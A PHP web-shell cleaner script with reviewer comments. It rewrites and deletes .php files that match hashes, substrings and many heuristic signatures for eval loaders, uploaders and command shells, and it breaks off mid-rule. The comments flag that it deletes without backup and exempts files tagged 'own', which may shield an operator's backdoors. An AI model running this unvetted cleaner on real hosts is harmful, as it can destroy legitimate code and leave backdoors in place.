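<?php
/**
 * One-shot file-system scanner. It walks a directory tree and, for every
 * regular file whose path contains ".php" and whose size is under 1,000,000
 * bytes, strips known injected snippets (clearWithPreg) and deletes files
 * that match a hash, substring or heuristic signature (deleteTrojan). The
 * report is printed between the literal markers "{->|" and "|<-}".
 *
 * Review notes for anyone finding this file on a host:
 *  - It edits and deletes files in place, with no backup and no dry-run
 *    mode. Several heuristics fire on one generic substring, so expect
 *    false positives on legitimate code.
 *  - pass() exempts any file carrying one of seven markers that the source
 *    labels "own1".."own7". Such files are reported under 'pass' and are
 *    never cleaned. Treat every 'pass' entry as unreviewed, not as clean.
 *  - NOTE(review): the "own" exemption list, the delimiter-framed output and
 *    the hard-coded absolute target path are consistent with a script pushed
 *    to the host by a remote operator rather than one maintained by the site
 *    owner. Confirm provenance before running it or trusting its report.
 */

/**
 * Print a value framed by the "{->|" / "|<-}" markers so a caller can cut
 * the report out of whatever else the response contains.
 *
 * @param string $i Text to emit (the JSON report in this script).
 */
function i($i)
{
    echo '{->|' . $i . '|<-}';
}

/**
 * Case-sensitive substring test that is also true for a hit at offset 0.
 *
 * The original rules used bare strpos() as a boolean, which silently ignores
 * a needle found at the very start of the text.
 *
 * @param string $haystack
 * @param string $needle
 * @return bool
 */
function containsText($haystack, $needle)
{
    return strpos($haystack, $needle) !== false;
}

/**
 * True when the text holds a run of 200 or more characters drawn from
 * [0-9a-zA-Z/+], which many rules below use as an "encoded payload" hint.
 *
 * @param string $txt
 * @return bool
 */
function hasLongEncodedRun($txt)
{
    return preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt) === 1;
}

/**
 * Recursively scan $dir, cleaning or deleting matching files.
 *
 * Symlinks are skipped. Every candidate file is chmod'ed to 0644 before it
 * is read, whether or not it turns out to match anything.
 *
 * @param string $dir  Directory to walk.
 * @param array  $info Report accumulator, updated in place.
 */
function searchDirs($dir, &$info)
{
    // The original iterated over scandir()'s false result for unreadable or
    // non-directory paths; bail out quietly instead.
    if (!is_dir($dir)) {
        return;
    }
    $files = scandir($dir);
    if (!is_array($files)) {
        return;
    }

    foreach ($files as $file) {
        if ($file == '.' || $file == '..') {
            continue;
        }

        $real_dir = str_replace("//", "/", $dir . "/" . $file);
        if (is_link($real_dir)) {
            continue;
        }

        if (!is_file($real_dir)) {
            searchDirs($real_dir, $info);
            continue;
        }

        $info['file_count']++;
        $size = filesize($real_dir);

        // NOTE(review): stripos() matches ".php" anywhere in the full path,
        // so a file inside a directory named "x.php.d" qualifies too.
        if (!($size < 1000000 && stripos($real_dir, '.php') !== false)) {
            continue;
        }

        @chmod($real_dir, 0644);
        $content = file_get_contents($real_dir);
        if ($content === false) {
            // Unreadable file: nothing to match against.
            continue;
        }

        if (pass($real_dir, $content, $info)) {
            continue;
        }

        if (strpos($real_dir, 'lock360.php') !== false) {
            if (@unlink($real_dir) == true) {
                $info['trojan'][] = array(
                    'path' => $real_dir,
                    'status' => 1
                );
                // The file is gone. Running the later stages would write it
                // back (clearWithPreg) or recreate it empty (deleteTrojan).
                continue;
            }
        }

        clearWithPreg($real_dir, $content, $info);
        deleteTrojan($real_dir, $content, $size, $info);
    }
}

/**
 * Strip known injected snippets from a file and write the result back.
 *
 * Each entry pairs a plain substring prefilter ("check") with the body of a
 * /si regex ("preg"). When the prefilter hits, the regex match is removed
 * and the file is rewritten. One 'hide_code' record is appended per hit.
 *
 * The patterns are broad (lazy dot-all spans) and there is no backup, so a
 * hit can remove legitimate code that sits between the two anchors.
 *
 * @param string $real_dir Path of the file being cleaned.
 * @param string $content  File content as read by the caller.
 * @param array  $info     Report accumulator, updated in place.
 */
function clearWithPreg($real_dir, $content, &$info)
{
    $feature = array(
        array("check" => '$bkindex', "preg"=>'\$index = \$_S.+?ht,0444[^}]+}[^}]+}'),
        array("check" => '$bkindex', "preg"=>'\$index = \$_S.+(?=function wp_schedule_event)'),
        array("check" => '$bkindex', "preg"=>'if\(function_exists\(\'sys_get_temp_dir.+(?=function wp_schedule_event)'),
        array("check" => '$bkidex', "preg"=>'\$inxdex = \$_S.+\'292\'\); } }'),
        array("check" => '//ckIIend', "preg"=>'\/\/ckIIbg.+?\/\/ckIIend'),
        array("check" => '//ckIIbg', "preg"=>'\/\/ckIIbg.+?nowIndexFile,0555.+?}.+?}'),
        array("check" => '$ruzhu_php_jm', "preg"=>'\$do.+?ruzhu_php_jm.+?2018-09-10 20:28:01"\);}'),
        array("check"=>'scp-173', "preg"=>'<\?php.+?scp-173\?>'),
        //array("check"=> 'x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6', "preg"=>'\$ZdJ=.+?Qj=="\);'),
        array("check"=> 'x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6', "preg"=>'<\?php error_reporting\(0\);.+?\?>'),
        array("check"=> '\x34\x35\x34\x33\x63\x68\x64\x69\x72\x65\x78\x65\x63\x70\x68\x70\x70\x73', "preg"=> '<\?php error_reporting.+?\);}'),
        array("check"=> 'PCFET0NUWVBFIEhUTUwgUFVCTE', "preg"=> '<\?php.+?PCFET0NUWVBFIEhUTUwgUFVCTE.+?>'),
        array("check"=> 'file_get_contents($index_path)', "preg"=> '<\?php.+?file_put_contents\(\$index_path, \$index_hide\).+?>'),
        array("check"=> 'file_get_contents($index_path)', "preg"=> '\$path = ".+?\$htaccess, 0444\);\s+?}\s+?}'),
        array("check"=> 'open_cache_ruzhu_phpcode', "preg"=> 'error_reporting[^}]+?open_cache_ruzhu_phpcode.+?huan_yuan_htaccess.+?}'),
        array("check"=>'@include "\\', "preg"=>'@include.+?;'),
        array("check"=>'global $O', "preg"=>'<\?php @header\(.+\$O\[[0-9]{1,2}\]\);} \?>'),
        array("check"=>'/* Custom write log to ensure the operation of the website */', "preg"=>'\/\* Custom write log to ensure the operation of the website \*\/.+\$shut\[1\]\(\);'),
        array("check"=>'function_exists(\'copy\')', "preg"=>'if\(function_exists\(\'copy\'\)\){[^}]+}'),
        array("check"=>'$get_size_of_file', "preg"=>'\$get_size_of_file.+?call_user_func.+?;}}'),
        array("check"=>'/* index-configs */', "preg"=>'<\?php \/\* index-configs \*\/.+eval.+\?>'),
        array("check"=>'$ihx .= "define', "preg"=>'\$i = .+?\$ihx \.=.+?}.+?}'),
        array("check"=> '@include base64_decode("', "preg" => '@include base64_decode\("[^"]+"\);'),
        array("check"=> '@include base64_decode(\'', "preg" => '@include base64_decode\(\'[^\']+\'\);'),
        array("check"=> '@include($f)', "preg" => '\$_HEADERS = getallheaders.+?@unlink\(\$f\);}'),
        array("check"=> '$i = \'inde\'.\'x.php\'', "preg" => '\$i = \'inde\'\.\'x\.php\';.+?LOCK_EX\);.*?}'),
        array("check"=> '@call_user_func(', "preg" => '\$f_size =.+@call_user_func.+?}\s+}\s+}'),
        array("check"=> '$inxxdex', "preg" => '\$inxxdex = .+?\$inxxdex = "";'),
        array("check"=> '$ixsssxdx', "preg" => '\$ixsssxdx =.+\$ixsssxdx.+?\);\s+}\s+}'),
        array("check"=> '@include_once', "preg" => '\/\*[a-zA-Z0-9]{4,7}.+?@include_once.+?\/\*[a-zA-Z0-9]{4,7}'),
        array("check"=> '/** elutguozk fbz **/', "preg" => '<\?php \$.+?\/\*\* elutguozk fbz \*\*\/.+?\?>'),
        array("check"=> '@include ', "preg" => '@include ".+?";'),
        array("check"=> '$hct', "preg" => 'if\(\$hct.+\$bksht.+?\);\s+}\s+}'),
        // NOTE(review): "\wp-emoji" below parses as \w followed by "p-emoji";
        // it looks like a path separator was intended. Left as found.
        array("check"=> '$hct', "preg" => 'if\(\$hct.+\wp-emoji-in\.min.+?.+292.+?\);\s+}\s+}'),
        //
        //array("check"=>'include "', "preg"=>'include ["\'][^\']+?[^.php]["\'];'),
    );

    foreach ($feature as $item) {
        if (strpos($content, $item['check']) === false) {
            continue;
        }

        $old_length = strlen($content);
        $cleaned = preg_replace('/' . $item['preg'] . '/si', "", $content);

        if ($cleaned === null) {
            // preg_replace() returns null on a PCRE failure (for instance a
            // backtrack limit hit by the lazy dot-all spans). Writing that
            // back would truncate the file to zero bytes, so leave the file
            // alone and record that nothing was written.
            $info['hide_code'][] = array(
                'path' => $real_dir,
                'feature' => $item['check'],
                'old_length' => $old_length,
                'new_length' => $old_length,
                'written_length' => false
            );
            continue;
        }

        $content = $cleaned;

        // Owner-write is all the rewrite needs. The original set 0777 here
        // and never restored it, leaving every cleaned file world-writable.
        @chmod($real_dir, 0644);
        $new = @file_put_contents($real_dir, $content);

        $info['hide_code'][] = array(
            'path' => $real_dir,
            'feature' => $item['check'],
            'old_length' => $old_length,
            'new_length' => strlen($content),
            'written_length' => $new
        );
    }
}

/**
 * Delete a file that matches a known hash, a known substring or one of the
 * heuristic rules in other1()..other14().
 *
 * Stages run in that order. Each attempt appends a record to
 * $info['trojan'] with status 1 (deleted) or 0 (delete failed). When the
 * heuristic stage cannot delete the file it is truncated to zero bytes.
 *
 * Processing stops as soon as the file has been deleted. The original kept
 * going, logged failed deletes for a file that no longer existed, and could
 * recreate it empty through the truncation fallback.
 *
 * @param string $real_dir Path of the file under test.
 * @param string $content  File content as read by the caller.
 * @param int    $size     File size in bytes, used by size-gated rules.
 * @param array  $info     Report accumulator, updated in place.
 */
function deleteTrojan($real_dir, $content, $size, &$info)
{
    // MD5 digests of whole files to delete on sight.
    $feature = array(
        "3ed2bcd9af3a8a4cc6a2d64c0e29323a",
        "4500d7207ae89f588ae6bb46dc4cfc4c",
        'e95257e2f87a5324faa741d7bd256d10',
        '380fa777b8c37fb60811e5972391261b',
        'af92294c9e7d5f25ca0f7ec2371a830d',
        '656fd2931ced4e62f2b73b065c1cb834',
        'a9939c9ec3f1c09aba4a9c031b69d5b1',
        'e72a4bad8eeb37181a5ac116073a0f2f',
        '565ae477a280cb823d049e0e99c069b9',
        'f2820d0981f75a2dae76e1ef4d628fe3',
        'f66c24dd3c20ae8d4c2e71b27d4a3a2c',
        '6bcb1a0971168190045636f83c490226',
        '7c20feb7139226fbbbaa6d962adf5a75',
        '0c76ba322ca7009f0a155fce8dbbd9e0',
        'e23b765107d824560a1edbb9e98f7ad7',
        '00c121a6f126196a2f159aaacb59a94d',
        '4056a2010da76111934c397f989bc1bc',
        'fe8363339acbf327271cd5dc6843098b',
        'b263f5b0dfcce9774f6e70f0932afcf2',
        'cdf89ad3c74d0d6f4ce88eaa578440e8',
        '0152b6b8bc439e5cc3f8fde49952e470',
        '1e499ce31b1879197b746d50aa21901e',
        '82e89c090162303f2b95f0b916c2e1e6',
        '1970fbfd414373d0c98ab147b9cb2022',
        'c530b3e97a4642da2eab74d9b4f2d61c',
        '2f1c426b9c3e4b01427bdc69262ee8de',
        'bcec677bac0083b7c4a0849ccaa0f711',
        '8827c82e802c7d4df006148fd14e9ebc',
        '363f04ba317bed872f62d2d9e6fdae19',
        '5db85c130f31f2cb623d5a285997a704',
        'b857f22b00098f85aa4d77acd58df73c',
        '770616aff8677a033e946f6f01eb6ba3',
        '112fc0af846dc2f6664f1a68f6f53594',
        '893e4dde777558cc5fec4276c5a94dc0',
        'd39ac622537d80caf7cb630899250e00',
        'dacc0f895428822979bda234f4f15bfe',
        '8dec392ede6ffafe434b401cf8e59cee',
        '1a09efdc2d5a1f8b31132238651df3fb',
        'a55395546859b922c4b7808b959043c0',
        'aba3d13150cba65a25a974f6f66e25a4',
        '4f6ca51ca0eba1c4ec9dab8f7fbfa87d',
        '2240b1ed64d66a77d365934b42303ae9',
        'bc747ff54ee849a60d2eb86208796115',
        'b69bf8f5901d6be8fa239591fe752f39',
        'ab3ab227167426b00efe41924ff86190',
        '89d91ddee6f715acba63dc9e03e86de0',
        'f67cf7731c19a10d0549419cef9619f0'
    );

    // Substrings that mark a file for deletion wherever they occur.
    $feature_for_contain = array(
        '"bas"."e64_d"."ecode"',
        "'base64','_deco','de'",
        '"ba" . "se6" . "4"',
        "'helloword','create_','hellowordfunction'",
        'I could not have a more welcome visitor 64 group of zain bani',
        '_=\'Loading Class/Code NAME\'',
        'PHP Encode v1.0 by zeura.com',
        'get1_str($str1)',
        '$_GET[\'ername\']',
        'isset($_POST[\'f_p\'])',
        'cb508614978e98198cb3d9c89d0fc47f'
    );

    // Stage 1: whole-file hash. Strict comparison avoids PHP's numeric
    // string juggling on digests that happen to look like numbers.
    if (in_array(md5($content), $feature, true)) {
        $removed = (@unlink($real_dir) == true);
        $info['trojan'][] = array(
            'path' => $real_dir,
            'status' => $removed ? 1 : 0
        );
        if ($removed) {
            return;
        }
    }

    // Stage 2: known substrings.
    foreach ($feature_for_contain as $item) {
        if (strpos($content, $item) === false) {
            continue;
        }
        $removed = (@unlink($real_dir) == true);
        $info['trojan'][] = array(
            'path' => $real_dir,
            'status' => $removed ? 1 : 0,
            'feature' => $item
        );
        if ($removed) {
            return;
        }
    }

    // Stage 3: heuristic rules, with truncation as the fallback when the
    // file cannot be deleted.
    $result = other($size, $content, $real_dir);
    if ($result != '') {
        if (@unlink($real_dir) === true) {
            $status = 1;
        } else {
            file_put_contents($real_dir, '');
            $status = 0;
        }
        $info['trojan'][] = array(
            'path' => $real_dir,
            'status' => $status,
            'feature' => $result
        );
    }
}

/**
 * True when $fileSize is within 250 bytes (exclusive) of $checkSize.
 *
 * @param int $fileSize
 * @param int $checkSize
 * @return bool
 */
function checkSize($fileSize, $checkSize)
{
    return abs($fileSize - $checkSize) < 250;
}

/*
 * Heuristic rule groups. Each otherN($size, $txt, $realDir) returns the label
 * of the first rule that matches, or '' when none does. other() tries the
 * groups in numeric order, so rule order is significant.
 *
 * NOTE(review): many needles are lower-cased superglobal names ('$_post',
 * '$_cookie', '$_files', '$_get', '$_server') while the match is
 * case-sensitive and nothing visible lower-cases $txt. Those rules look as
 * if they were written for lower-cased input. Confirm against the caller.
 */

/** Rules other1..other10. */
function other1($size, $txt, $realDir)
{
    if (containsText($txt, 'null;@eval(') && containsText($txt, '};$')) {
        return 'other1';
    }
    if (containsText($txt, 'get_str') && containsText($txt, 'str_rot13') && containsText($txt, '@eval(')) {
        return 'other2';
    }
    if (containsText($txt, 'ignore_user_abort') && containsText($txt, "@include(pack(")) {
        return 'other3';
    }
    if (containsText($txt, 'base64_decode') && containsText($txt, "@chmod") && containsText($txt, '=="')
        && !containsText($txt, 'cpa_ind5.php')) {
        return 'other4';
    }
    if (containsText($txt, 'gzuncompress(strrev(') && containsText($txt, "create_function") && checkSize($size, 22534)) {
        return 'other5';
    }
    if (containsText($txt, 'cdn.jsdelivr.net') && containsText($txt, "sweetalert.min.js") && checkSize($size, 13695)) {
        return 'other6';
    }
    if (containsText($txt, ')return') && containsText($txt, "}else{function")) {
        return 'other7';
    }
    if (containsText($txt, 'class_uc_key') && containsText($txt, "hexdec") && checkSize($size, 60048)) {
        return 'other8';
    }
    if (containsText($txt, 'require(@$') && containsText($txt, "error_reporting(0);")
        && containsText($txt, "set_time_limit(0);")) {
        return 'other9';
    }
    if (containsText($txt, '$_post') && containsText($txt, '$_cookie') && containsText($txt, 'md5(')
        && containsText($txt, '@setcookie') && containsText($txt, 'create_function')) {
        return 'other10';
    }
    return '';
}

/** Rules other11..other20. */
function other2($size, $txt, $realDir)
{
    if (containsText($txt, ';@include(') && containsText($txt, '$_post') && containsText($txt, '$_cookie')
        && containsText($txt, 'return @$')) {
        return 'other11';
    }
    if (containsText($txt, "getcwd") && containsText($txt, 'file_exists') && containsText($txt, '@chdir')
        && containsText($txt, '@scandir')) {
        return 'other12';
    }
    if (containsText($txt, '.chr(') && containsText($txt, "@include(") && containsText($txt, "chr(ord($")) {
        return 'other13';
    }
    if (containsText($txt, 'register_key') && containsText($txt, "kaylin") && checkSize($size, 86523)) {
        return 'other14';
    }
    if ((containsText($txt, "base64_decode") || containsText($txt, 'error_reporting'))
        && containsText($txt, '"display_errors"') && containsText($txt, 'function_exists')) {
        return 'other15';
    }
    if (containsText($txt, "base64_decode") && containsText($txt, 'fwrite') && containsText($txt, '.php?pass=')) {
        return 'other16';
    }
    if (containsText($txt, '$_server["\x') && containsText($txt, "serialize")) {
        return 'other17';
    }
    if (containsText($txt, 'parse_str') && containsText($txt, "<?=") && !containsText($txt, 'highlighter')) {
        return 'other18';
    }
    if (containsText($txt, 'eval(') && containsText($txt, "foxauto")) {
        return 'other19';
    }
    if (containsText($txt, 'eval(') && containsText($txt, 'rawurldecode(') && containsText($txt, 'function%20')) {
        return 'other20';
    }
    return '';
}

/** Rules other21..other30. */
function other3($size, $txt, $realDir)
{
    if (containsText($txt, '$g($b($c))') && containsText($txt, "_dec") && checkSize($size, 7563)) {
        return 'other21';
    }
    if (containsText($txt, '$_post[') && containsText($txt, "eval(") && containsText($txt, ";@$")
        && checkSize($size, 453)) {
        return 'other22';
    }
    if (containsText($txt, 'filemtime') && containsText($txt, "preg_match('#<") && checkSize($size, 21596)) {
        return 'other23';
    }
    if (containsText($txt, 'parse_str') && containsText($txt, "eval") && containsText($txt, "'1=%'")) {
        return 'other24';
    }
    if (containsText($txt, 'php_uname') && containsText($txt, "move_uploaded_file") && checkSize($size, 1133)) {
        return 'other25';
    }
    if (containsText($txt, 'dehex(') && containsText($txt, "/etc/named.conf")
        && containsText($txt, '$_files["uploadfile"]')) {
        return 'other26';
    }
    if (containsText($txt, '?><?php') && containsText($txt, ");$") && containsText($txt, "'}'")) {
        return 'other27';
    }
    if (containsText($txt, 'function_exists') && containsText($txt, ");@$") && containsText($txt, '.="\x')) {
        return 'other28';
    }
    if (containsText($txt, '"\1') && containsText($txt, "gettype")
        && (containsText($txt, ";@$") || containsText($txt, "count"))) {
        return 'other29';
    }
    if (containsText($txt, "return 'other'.$") && containsText($txt, '},$') && containsText($txt, '});$')) {
        return 'other30';
    }
    return '';
}

/** Rules other31..other40. */
function other4($size, $txt, $realDir)
{
    if (containsText($txt, '"\r\n"') && containsText($txt, '= @$') && containsText($txt, 'new ')
        && containsText($txt, 'chr($')) {
        return 'other31';
    }
    if (containsText($txt, 'index.php') && containsText($txt, '@file_put_contents')
        && containsText($txt, 'xiaoxiannv')) {
        return 'other32';
    }
    if (containsText($txt, ';@$') && containsText($txt, ")].$") && containsText($txt, "(('')")) {
        return 'other33';
    }
    if (containsText($txt, ']];$') && containsText($txt, "base64_decode") && containsText($txt, "mktime")) {
        return 'other34';
    }
    if ((containsText($txt, '_files') || containsText($txt, 'base64_decode'))
        && containsText($txt, '_get')
        && (containsText($txt, "error_reporting") || containsText($txt, "ignore_user_abort")
            || containsText($txt, "fm_convert_win"))
        && containsText($txt, 'set_time_limit')
        && !containsText($realDir, '.min.js')
        && !containsText($txt, 'updraftplus')
        && !containsText($txt, 'EASYPOPULATE_CONFIG')) {
        return 'other35';
    }
    if (containsText($txt, '$_post')
        && (containsText($txt, 'file_put_contents') || containsText($txt, "fopen"))
        && containsText($txt, 'error_')
        && containsText($txt, 'script')
        && containsText($txt, '_files')
        && (containsText($txt, 'opendir') || containsText($txt, 'scandir'))
        && containsText($txt, 'chmod')
        && containsText($txt, 'filesize')
        && containsText($txt, 'ini_')
        && containsText($txt, 'exec(')) {
        return 'other36';
    }
    if (containsText($txt, 'php_uname') && containsText($txt, "mail(") && containsText($txt, "json_encode")
        && containsText($txt, '$_get') && containsText($txt, 'curl_exec')) {
        return 'other37';
    }
    if (containsText($txt, "eval('?>'.$") && !containsText($txt, 'mustache')) {
        return 'other38';
    }
    if (containsText($txt, 'eval(')
        && (containsText($txt, "base64_decode(") || containsText($txt, '\x6')
            || containsText($txt, 'openssl_decrypt'))) {
        return 'other39';
    }
    if (containsText($txt, 'multipart') && containsText($txt, 'type="file"')
        && (containsText($txt, 'if(@copy') || containsText($txt, '@fopen'))) {
        return 'other40';
    }
    return '';
}

/** Rules other41..other50. */
function other5($size, $txt, $realDir)
{
    if ((containsText($txt, 'base64_decode') || containsText($txt, '@shmop_open'))
        && containsText($txt, '$_files') && containsText($txt, '@copy')
        && !containsText($txt, 'wp_handle_upload_error')) {
        return 'other41';
    }
    if (containsText($txt, 'goto') && containsText($txt, ": function") && containsText($txt, ": eval(")) {
        return 'other42';
    }
    if (containsText($txt, 'F-Automatical') && containsText($txt, '$_POST[\'email\']')
        && containsText($txt, 'Send an report to')) {
        return 'other43';
    }
    if (containsText($txt, 'goto ') && containsText($txt, 'base64_decode') && containsText($txt, 'symlink')) {
        return 'other44';
    }
    if (preg_match("/(chr\([0-9]{1,3}\)\.){5}/si", $txt)) {
        return 'other45';
    }
    if (preg_match_all("/\([0-9]{5}-[0-9]{5}\)/si", $txt, $matches) > 5) {
        return 'other46';
    }
    if (containsText($txt, '\'log_errors\'') && containsText($txt, '\'error_log\'')
        && containsText($txt, '\'error_reporting\'')) {
        return 'other47';
    }
    if (containsText($txt, 'range(chr(126),chr(20));')) {
        return 'other48';
    }
    if (containsText($txt, '$_POST[\'cmd\'] == "get_file_data"')
        && containsText($txt, '$_POST[\'cmd\'] == "get_files"')
        && containsText($txt, '$_POST[\'cmd\'] == "shell_exec"')) {
        return 'other49';
    }
    if ((containsText($txt, "PD9waH") || containsText($txt, "Ym90Ym90Ym90")) && hasLongEncodedRun($txt)) {
        return 'other50';
    }
    return '';
}

/** Rules other51..other60. */
function other6($size, $txt, $realDir)
{
    if (containsText($txt, "htaccess_rul") && hasLongEncodedRun($txt)) {
        return 'other51';
    }
    if (containsText($txt, "%21mod%5B%7C%22D%") && containsText($txt, "gzinflate(base64_decode")
        && containsText($txt, "curl_exec")) {
        return 'other52';
    }
    if (containsText($txt, "WaomRuw") && hasLongEncodedRun($txt)) {
        return 'other53';
    }
    if (preg_match("/goto [a-zA-Z0-9]{5};/si", $txt)) {
        return 'other54';
    }
    if (preg_match('/@unlink\(\$[0oO]+\);/si', $txt)) {
        return 'other55';
    }
    if (containsText($txt, 'eval("\"$A\"");') && containsText($txt, '_POST[911]')) {
        return 'other56';
    }
    if (containsText($txt, '199093f0455d6e79bb8e4bbe1ae1b86d') && containsText($txt, 'HTTP_USER_AGENT')) {
        return 'other57';
    }
    if (preg_match('/function [a-z][0-9]\(\$[a-z][0-9], \$[a-z][0-9]{2}\){return @\$[a-z][0-9][[0-9]+]\(\$[a-z][0-9][[0-9]+], \$[a-z][0-9]{2}\);}/si', $txt)) {
        return 'other58';
    }
    if (containsText($txt, "Create_Function") && hasLongEncodedRun($txt)) {
        return 'other59';
    }
    // More than five two-letter goto labels.
    if (preg_match_all('/goto [a-zA-Z]{2};/si', $txt, $matches) > 5) {
        return 'other60';
    }
    return '';
}

/** Rules other61..other70 (the label other65 is used by two rules). */
function other7($size, $txt, $realDir)
{
    if (containsText($txt, "eval") && containsText($txt, "hex2bin") && hasLongEncodedRun($txt)) {
        return 'other61';
    }
    if (containsText($txt, "https://glot.io/snippets") || containsText($txt, "https://glot.io/static")) {
        return 'other62';
    }
    if (containsText($txt, '$pwd=base64_encode($pwd)') && containsText($txt, "eval") && hasLongEncodedRun($txt)) {
        return 'other63';
    }
    // Long encoded run plus more than five bracketed arithmetic terms.
    if (hasLongEncodedRun($txt)
        && preg_match_all('/\([0-9]{1,3}[-+*\/][0-9]{1,3}\)/si', $txt, $matches) > 5) {
        return 'other64';
    }
    if (containsText($txt, 'Upload $i Files Successfully!') && containsText($txt, "Create Folder Successfully!")
        && containsText($txt, "Create File Successfully!")) {
        return 'other65';
    }
    if (containsText($txt, 'empty($_POST[\'email\'])')
        && containsText($txt, 'Result Report Test - ".$xx,"WORKING !"')
        && containsText($txt, "send an report")) {
        return 'other65';
    }
    if (containsText($txt, "loggedIn") && containsText($txt, "EVAL") && hasLongEncodedRun($txt)) {
        return 'other66';
    }
    if (containsText($txt, 'eval') && containsText($txt, '$_SESSION[$payloadName]')
        && containsText($txt, "php://input")) {
        return 'other67';
    }
    if (containsText($txt, "@create_function") && containsText($txt, "base64_decode") && hasLongEncodedRun($txt)) {
        return 'other68';
    }
    if (containsText($txt, "\$_COOKIE['f_pp']") && containsText($txt, "\$_POST['f_pp']")
        && hasLongEncodedRun($txt)) {
        return 'other69';
    }
    if (containsText($txt, "shell519") && containsText($txt, '$shell_content3')
        && containsText($txt, "read_dir_queue1")) {
        return 'other70';
    }
    return '';
}

/** Rules other71..other80. */
function other8($size, $txt, $realDir)
{
    if (containsText($txt, "unlink('.hindexcontent');") && containsText($txt, "wp-content/plugins/akismet")
        && containsText($txt, "'wp-content/themes")) {
        return 'other71';
    }
    if (containsText($txt, "bjRficAiyoSn") && containsText($txt, "unlink") && containsText($txt, '$f(')) {
        return 'other72';
    }
    if (containsText($txt, "https://hastebin.com/raw/") && containsText($txt, "/999MD999.html")
        && containsText($txt, '$_FILES')) {
        return 'other73';
    }
    if (containsText($txt, "Shell Bypass 403") && containsText($txt, "unlink(\$_GET['delete']")) {
        return 'other74';
    }
    if (containsText($txt, "is_cli()") && containsText($txt, "disable_functions") && containsText($txt, "ini_get")) {
        return 'other75';
    }
    if (containsText($txt, "\$pp6 = Array()") && containsText($txt, "se1(\$we2)")
        && containsText($txt, "ir7(\$pp6")) {
        return 'other76';
    }
    if (containsText($txt, "<!-- GIF89;a -->") && containsText($txt, "\$lokasinya")
        && containsText($txt, "\$_GET['pilihan']")) {
        return 'other77';
    }
    if (containsText($txt, "\$GNJ[]") && containsText($txt, "\$GNJ[33]") && containsText($txt, "(uhex(")) {
        return 'other78';
    }
    if (containsText($txt, "smisbot()") && containsText($txt, "\$Prefix")
        && containsText($txt, "@ignore_user_abort")) {
        return 'other79';
    }
    if (containsText($txt, "goto VZ") && containsText($txt, "\$_FILES[\"f\"]")
        && containsText($txt, "http_response_code")) {
        return 'other80';
    }
    return '';
}

/** Rules other81..other90. */
function other9($size, $txt, $realDir)
{
    if (containsText($txt, "@set_time_limit(0);") && containsText($txt, "\$_FILES[")
        && containsText($txt, "\$perms & 0x0100")) {
        return 'other81';
    }
    if (containsText($txt, "die;") && containsText($txt, "4@MTP*") && containsText($txt, "curl_setopt")) {
        return 'other82';
    }
    // NOTE(review): fires on any file with more than ten block comments of
    // 5-10 characters each, which ordinary commented code can reach.
    if (preg_match_all('/\/\*([^*]{5,10})\*\//si', $txt, $matches, PREG_PATTERN_ORDER) > 10) {
        return 'other83';
    }
    if (containsText($txt, "header('shell: :)')") && containsText($txt, 'http_response_code(404)')
        && containsText($txt, '$_FILES[\'a\'][\'name\']')) {
        return 'other84';
    }
    if (containsText($txt, "case 'batchDel'") && containsText($txt, '删除选中文件')
        && containsText($txt, '$_SERVER[\'DOCUMENT_ROOT\']')) {
        return 'other85';
    }
    if (preg_match('/\$[a-zA-Z]+\[\([0-9]+ - [0-9]+\) \/ [0-9]+\]/si', $txt) && hasLongEncodedRun($txt)) {
        return 'other86';
    }
    if (preg_match_all('/\$x[0-9]+=\$x[0-9]+\(\$_\[[0-9]+\]\);/si', $txt, $matches) > 5) {
        return 'other87';
    }
    if (containsText($txt, '$_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]')) {
        return 'other88';
    }
    if (containsText($txt, 'www.google.com/ping?sitemap') && containsText($txt, '$_SERVER[\'REQUEST_URI\']')
        && containsText($txt, 'CURLOPT_URL')) {
        return 'other89';
    }
    if (containsText($txt, "\$_GET['k']") && containsText($txt, '$_POST[\'cmd\'] == "mkdir"')
        && containsText($txt, '$_POST[\'cmd\'] == "upload"')) {
        return 'other90';
    }
    return '';
}

/** Rules other91..other100. */
function other10($size, $txt, $realDir)
{
    if (containsText($txt, "create_function ") && hasLongEncodedRun($txt)) {
        return 'other91';
    }
    if (containsText($txt, "class Killbot {") && containsText($txt, "error_reporting();")
        && containsText($txt, "session_start();")) {
        return 'other92';
    }
    if (preg_match('/EVaL\(\$[a-zA-Z0-9]{13}\);/si', $txt)) {
        return 'other93';
    }
    if (containsText($txt, "move_uploaded_file") && containsText($txt, "error_reporting(0)")
        && containsText($txt, "\$_FILES['file']")) {
        return 'other94';
    }
    if (containsText($txt, "@\$_POST['css']") && containsText($txt, '@eval("$this->name")')) {
        return 'other95';
    }
    if (containsText($txt, "@serialize") && containsText($txt, 'md5') && containsText($txt, '(ord(')
        && preg_match_all('/\$[^(]+\([0-9]+-[0-9]+\)/si', $txt, $matches) > 5) {
        return 'other96';
    }
    if (containsText($txt, "<title>Uploader")
        && containsText($txt, '$_SERVER[\'DOCUMENT_ROOT\']."</br>".php_uname()')
        && containsText($txt, '$_FILES[\'uploads\'][\'tmp_name\']')) {
        return 'other97';
    }
    if (containsText($txt, "error_reporting ") && containsText($txt, "display_errors ")
        && hasLongEncodedRun($txt)) {
        return 'other98';
    }
    if (containsText($txt, 'file_put_contents($lokasi."/".$_POST[\'namalink\'], @file_get_contents($_POST[\'darilink\']))')
        && containsText($txt, "Shell")) {
        return 'other99';
    }
    if (containsText($txt, '@file_put_contents($ps,doutdo($urlc))') && containsText($txt, "ping_sitemap(")) {
        return 'other100';
    }
    return '';
}

/** Rules other101..other110 (the label other103 is used by two rules). */
function other11($size, $txt, $realDir)
{
    if (containsText($txt, 'error_reporting(0);') && containsText($txt, '["tmp_name"]')
        && containsText($txt, '$_POST[\'nn\']')) {
        return 'other101';
    }
    if (containsText($txt, 'define(\'VERSION\',\'kaylin\');') && containsText($txt, 'array_walk')
        && containsText($txt, 'create_function')) {
        return 'other102';
    }
    if (hasLongEncodedRun($txt)) {
        if (preg_match_all('/\([0-9]+-[0-9]+\)/si', $txt, $matches) > 10) {
            return 'other103';
        }
        if (containsText($txt, 'base64_decode') && containsText($txt, 'ord(')) {
            return 'other103';
        }
    }
    if (containsText($txt, '@eval($_POST[$a]);') || containsText($txt, '@eval($_POST[\'google\']);')) {
        return 'other104';
    }
    if (containsText($txt, '?upload&q=\' . urlencode(encodePath(PATH))')
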